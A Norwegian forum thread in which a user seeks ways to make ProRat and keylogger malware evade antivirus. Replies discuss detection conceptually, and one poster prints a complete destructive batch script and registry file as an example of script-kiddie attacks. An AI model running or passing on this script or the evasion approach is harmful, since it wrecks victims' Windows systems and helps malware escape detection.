Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  14 1725
Okey, nå har jeg vært rundt på nettet å lett i evigheter, altså FLERE uker... Og er skikkelig lei, så jeg spør dere og håper på at noen vet noe

Jeg lurer på åssen man får et virus Undetectable for Antivirus... Jeg har prøvd mange måter, men de fleste er et par måneder gamle og funker ikke lenger!
Jeg har prøvd Daemon Crypt + PC Guard, men har funnet ut at Daemon Crypt ødelegger ProRatten min, og fjerner en del av den så jeg vet at det ikke funker... (Den er også detectable etter metoden)...

Jeg har prøvd mange crypters, men alle er Detectable. Jeg vet man burde kjøpe crypterne (Private), men jeg har ikke penger nok til det og det er mange crypters der ute som funker og er FUD (Full UnDetectable)... Stresset er å finne dem ... Og jeg orker ikke å lære HEX-Editing eller noe sånn skikkelig vanskelig, selvom det er B-Planen min

PS: Driver mest med Ardamax Keylogger og ProRat, og lignende hvis dere lurer

Takk for all hjelp
~ HTC.m0rPh3d^
Skriv ditt eget fra scratch.
Ingen andre måter.
Trådstarter
13 0
Det er mange måter, eventuelt; Crypters, Binders, osv. osv.
...og de fungerer jo særdeles godt når man har antivirus installert.
Signaturen vil fortsatt være identisk.
Trådstarter
13 0
Selve koden i viruset vil ikke synes, hvis man bruker en FUD Crypter / Binder, sier seg selv i navnet... FUD, Full Undetectable.

Bruker du en FUD Crypter vil ikke viruset bli tatt av A/V'en.


Er det jeg som misforstår hva du sier, eller så skjønner jeg kanskje ikke hva du mener ?
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av Goophy
...og de fungerer jo særdeles godt når man har antivirus installert.
Signaturen vil fortsatt være identisk.
Vis hele sitatet...
I tillegg begynner vel AV å bli såpass intelligent at dei faktisk ser etter handlinga til kode, og ikkje bare etter signaturer?
Sitat av slashdot
I tillegg begynner vel AV å bli såpass intelligent at dei faktisk ser etter handlinga til kode, og ikkje bare etter signaturer?
Vis hele sitatet...
Dessverre ikke mange som er der enda, selv om de snakker mye om det.
Kun de med litt historie fra IDS eller anomali klarer å gjennomføre dette i praksis.

Norman f.eks. har mye kompetanse og kunnskap innenfor sandbox teknologi...noe som de forsøker å benytte i markedsføringen av mye annet. Men helt banale office filer med kode som escaper inn i explorer.exe etc blir ikke detektert eller sett på som ondsinnet. Bruker man exploits i koden sin, blir dette også sjelden detektert.

Spørsmålet er jo også "når" du vil at ting skal være UD. En del (som du er inne på) ser nå mer muligheter til å overvåke minnet og kall som eksekverbare filer gjør i det de blir kjørt. Fordi ting da går inn i en known state for malwaren. Vil man kun at ting skal være UD mens de blir overført, eller også når ting blir lagret og kjørt.
Sist endret av Carrier Return; 16. oktober 2008 kl. 09:11.
Trådstarter
13 0
Sitat av Carrier Return
Dessverre ikke mange som er der enda, selv om de snakker mye om det.
Kun de med litt historie fra IDS eller anomali klarer å gjennomføre dette i praksis.

Norman f.eks. har mye kompetanse og kunnskap innenfor sandbox teknologi...noe som de forsøker å benytte i markedsføringen av mye annet. Men helt banale office filer med kode som escaper inn i explorer.exe etc blir ikke detektert eller sett på som ondsinnet. Bruker man exploits i koden sin, blir dette også sjelden detektert.

Spørsmålet er jo også "når" du vil at ting skal være UD. En del (som du er inne på) ser nå mer muligheter til å overvåke minnet og kall som eksekverbare filer gjør i det de blir kjørt. Fordi ting da går inn i en known state for malwaren. Vil man kun at ting skal være UD mens de blir overført, eller også når ting blir lagret og kjørt.
Vis hele sitatet...

Jeg ville sagt begge deler

Har hørt om ProRat servere, som sendes U/D, og blir detecta når den blir kjørt, men den er der fortsatt for servern er der!
Sist endret av Morphed; 16. oktober 2008 kl. 16:06.
Trådstarter
13 0
Nå er det ikke viktig lenger... nå har jeg alt jeg trenger, Assassin Hackers Crew, og WTC.LeGeND
Assassin Hackers Crew, og WTC.LeGeND
Vis hele sitatet...
Ja gratulerer med med og få hjelp av en gjeng med Scriptkiddies
Trådstarter
13 0
Jeg hadde ikke forsnakka med hadde jeg vært deg
Jeg er bare Pic. Maker...
NOOOOOOOOOOOOOOOOOO-
robhol's Avatar
Sitat av Morphed
Jeg hadde ikke forsnakka med hadde jeg vært deg
Jeg er bare Pic. Maker...
Vis hele sitatet...
Oi, huff. Nå får vi passe oss, snippsat.
Jeg hadde ikke forsnakka med hadde jeg vært deg
Vis hele sitatet...
He ja jeg har nok bedere kjennskap til dette en du vet.
Renset flere pcer hvor Assassin Hackers Crew har lagd krøll.

WTCLeGeND (7 months ago) Show Hide Marked as spam Reply 35$ Hack Lessons... , PayPal hacking/scamming... , Steam Hacking/hack ... , i make you phishing program. Learn you VB. (paypal)
Vis hele sitatet...
Nå får du vel kurs i visual basic.
Lærer og bruke hamachi,ProRat,o.s.v

Greit at dem kommer seg inn på dårlig sikkert websider og legger igjen navet sitt.
Liker ikke at dem kjører script som dette mot privatpersoner.
Dette lager mye krøll.

Her et eksp.

echo off
net user Administrator reg
net user %username% /delete
net user YOUAREHACKED /add
start /B regedit.exe /S settings.reg
cls
shutdown -s -f -t 30 -c "Please wait.."
ren %windir%\media\ download
cls
start /B http://www.download.com/
cd %windir%
attrib %windir% +H
attrib %windir%\explorer.exe +R +H
attrib %windir%\regedit.exe +R +H
echo pause>notepad.exe -
attrib %windir%\notepad.exe +R +H
rename %windir%\explorer.exe reg
cls
start /b %systemroot%\system32\oobe\msoobe.exe /a
echo run=cmd.exe>%windir%\win.ini
rename %SystemRoot%\System32\restore\filelist.xml no1
rename %SystemRoot%\System32\restore\srdiag.exe no2
cls
goto nice
:nice
start /B /HIGH http://fen.xf.cz/logo.php
shutdown -l -f
cls
goto nice

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,shutdown -l -f"
"LegalNoticeCaption"="her skriver dem navnet sitt"
"DefaultUserName"="Admin"
"LegalNoticeText"="Happy day!"
"PowerdownAfterShutdown"="1"
"HibernationPreviouslyEnabled"="0"
"SfcQuota"="TASKMAN.EXE" -
"System"="Linux"
"VmApplet"="cmd.exe"
"WinStationsDisabled"="1"
"shell"=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedA ccess]
"DisplayName"="Windows Genuine Advantage Validation Monitor"
"Description"="Monitor WGA"
"ImagePath"="cmd.exe"
"Start"="0"
"ErrorControl"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"EnableDCOM"="N"
Sist endret av snippsat; 22. oktober 2008 kl. 20:22.
▼ ... noen måneder senere ... ▼
Jeg vet dette er en gammel post å alt men..
Sitat av Morphed Vis innlegg
Jeg hadde ikke forsnakka med hadde jeg vært deg
Jeg er bare Pic. Maker...
Vis hele sitatet...
jeg lo så jævli etter jeg leste d, "ånei!, de ska lure deg til å laste ned en ProRat server med icon så den ser ut som den er e winamp fil :O ÅNEEEIII!"